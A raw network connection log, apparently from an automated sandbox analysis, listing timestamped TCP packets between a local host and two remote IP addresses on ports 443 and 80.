Oct 27, 2024 17:11:14.758721113 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.796097040 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.796545029 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.796565056 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.796940088 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.796951056 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.804426908 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.804574966 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.804647923 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.804723024 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.804723024 CET	57785	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.804764986 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.804790974 CET	443	57785	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.806471109 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.806526899 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.806606054 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.806852102 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.806881905 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.930720091 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.930790901 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.930876017 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.930890083 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.930927992 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.930953026 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.930975914 CET	57786	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.930989981 CET	443	57786	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.931866884 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.931912899 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.932229042 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.932241917 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.933307886 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.933348894 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:14.933425903 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.933514118 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:14.933533907 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.060295105 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.060471058 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.060534954 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.060610056 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.060611010 CET	57787	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.060641050 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.060664892 CET	443	57787	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.062797070 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.062824011 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.063086033 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.063334942 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.063349962 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.267246008 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.268419981 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.268480062 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.268821955 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.268836975 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.404102087 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.404277086 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.404350996 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.445125103 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.445158005 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.445172071 CET	57788	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.445179939 CET	443	57788	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.466892958 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.466937065 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.467012882 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.485287905 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.485318899 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.497723103 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.498044014 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.498054981 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.498456955 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.498461008 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.560741901 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.561052084 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.561081886 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.561412096 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.561422110 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.628217936 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.628484011 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.628551960 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.628665924 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.628679037 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.628694057 CET	57789	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.628699064 CET	443	57789	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.630549908 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.630564928 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.630630016 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.630726099 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.630738020 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.675539970 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.679368019 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.679392099 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.679737091 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.679742098 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.679918051 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:15.680169106 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:15.685551882 CET	80	57795	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:15.685820103 CET	80	57783	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:15.685894966 CET	57783	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:15.686041117 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:15.686041117 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:15.691720963 CET	80	57795	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:15.692996979 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.693523884 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.693934917 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.695080996 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.695080996 CET	57790	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.695106030 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.695127964 CET	443	57790	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.696253061 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.696294069 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.696372032 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.696475029 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.696492910 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.807563066 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.807720900 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.807847977 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.808088064 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.808116913 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.808232069 CET	57791	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.808240891 CET	443	57791	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.810188055 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.810226917 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:15.811008930 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.811163902 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:15.811180115 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.173564911 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.176136971 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.176151037 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.176548004 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.176554918 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.211045980 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.211517096 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.211565018 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.211983919 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.211996078 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.306654930 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.306807995 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.306865931 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.306936979 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.306958914 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.306977034 CET	57792	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.306982994 CET	443	57792	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.309461117 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.309542894 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.309634924 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.309760094 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.309788942 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.340189934 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.340425968 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.340478897 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.340542078 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.340553045 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.340567112 CET	57793	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.340573072 CET	443	57793	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.342513084 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.342575073 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.342645884 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.343009949 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.343039989 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.384849072 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.391347885 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.391359091 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.391848087 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.391853094 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.449687004 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.450021982 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.450078964 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.450401068 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.450414896 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.520836115 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.520854950 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.520905018 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.520946026 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.521048069 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.521188974 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.521188974 CET	57794	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.521202087 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.521213055 CET	443	57794	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.524107933 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.524161100 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.524513006 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.524796009 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.524823904 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.562407017 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.562802076 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.562835932 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.563345909 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.563358068 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.563880920 CET	80	57795	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:16.563966990 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:16.582752943 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.582904100 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.583005905 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.583193064 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.583209038 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.583224058 CET	57796	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.583230019 CET	443	57796	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.586364985 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.586487055 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.586765051 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.586937904 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.586975098 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.693753958 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.693909883 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.694009066 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.694318056 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.694318056 CET	57797	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.694349051 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.694375038 CET	443	57797	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.696346045 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.696405888 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:16.696978092 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.697084904 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:16.697115898 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.045978069 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.068510056 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.083367109 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.083405018 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.084117889 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.084125996 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.107218981 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.107269049 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.107626915 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.107641935 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.209620953 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.209681988 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.209744930 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.209774971 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.209851980 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.209906101 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.210654020 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.210669041 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.210702896 CET	57798	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.210709095 CET	443	57798	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.213953972 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.214050055 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.214150906 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.216078043 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.216114998 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233025074 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233081102 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233140945 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.233165979 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233201027 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233225107 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.233253956 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.233289003 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.233316898 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.233340025 CET	57799	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.233354092 CET	443	57799	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.235280037 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.235307932 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.235526085 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.235651970 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.235666037 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.260447979 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.260956049 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.260982037 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.261217117 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.261228085 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.324381113 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.324738026 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.324769020 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.325129986 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.325141907 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.401942968 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.401957989 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.401993990 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.402103901 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.402221918 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.402251959 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.402292967 CET	57800	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.402307987 CET	443	57800	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.404079914 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.404122114 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.404210091 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.404311895 CET	57805	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.404329062 CET	443	57805	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.431401014 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.435132027 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.435151100 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.435514927 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.435525894 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.454117060 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.454272985 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.454423904 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.454423904 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.454492092 CET	57801	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.454524040 CET	443	57801	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.456769943 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.456816912 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.456902981 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.457148075 CET	57806	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.457161903 CET	443	57806	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.562542915 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.562701941 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.562808990 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.563054085 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.563083887 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.563152075 CET	57802	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.563165903 CET	443	57802	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.564924002 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.564975977 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.565069914 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.565176010 CET	57807	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.565200090 CET	443	57807	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.959737062 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.960280895 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.960342884 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.960732937 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.960747004 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.969661951 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.969989061 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.970002890 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:17.970367908 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:17.970372915 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.069788933 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.070063114 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.075469971 CET	80	57808	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:18.075653076 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.075803041 CET	57808	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.075963020 CET	80	57795	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:18.076037884 CET	57795	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:18.081756115 CET	80	57808	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:18.092502117 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.092664003 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.092729092 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.092833996 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.092833996 CET	57803	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.092866898 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.092890024 CET	443	57803	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.095042944 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.095093012 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.095202923 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.095304012 CET	57809	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.095338106 CET	443	57809	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.102014065 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.102092981 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.102154970 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.102226019 CET	57804	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:18.102235079 CET	443	57804	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:18.102272034 CET	57804	443	192.168.2.4	13.107.246.51
